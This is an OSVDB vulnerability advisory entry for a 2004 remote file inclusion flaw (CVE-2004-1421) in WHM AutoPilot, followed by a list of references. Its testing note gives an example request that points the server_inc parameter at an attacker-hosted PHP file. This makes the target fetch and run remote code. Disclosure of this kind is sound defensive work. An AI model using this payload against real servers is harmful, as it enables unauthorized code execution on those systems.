WHM AutoPilot step_one.php Arbitrary Command Execution

2004-12-28T16:56:24
ID OSVDB:12694
Type osvdb
Reporter OSVDB
Modified 2004-12-28T16:56:24

Description

Manual Testing Notes

http://[victim]/inc/header.php/step_one.php?server_inc=http://[attacker]/step_one_tables.php

References:

Vendor URL: http://www.whmautopilot.com/ Security Tracker: 1012707 Secunia Advisory ID:13673 Related OSVDB ID: 12693 Related OSVDB ID: 12696 Related OSVDB ID: 12695 Related OSVDB ID: 12697 Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00059-12272004 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0431.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0474.html Keyword: Remote File Inclusion CVE-2004-1421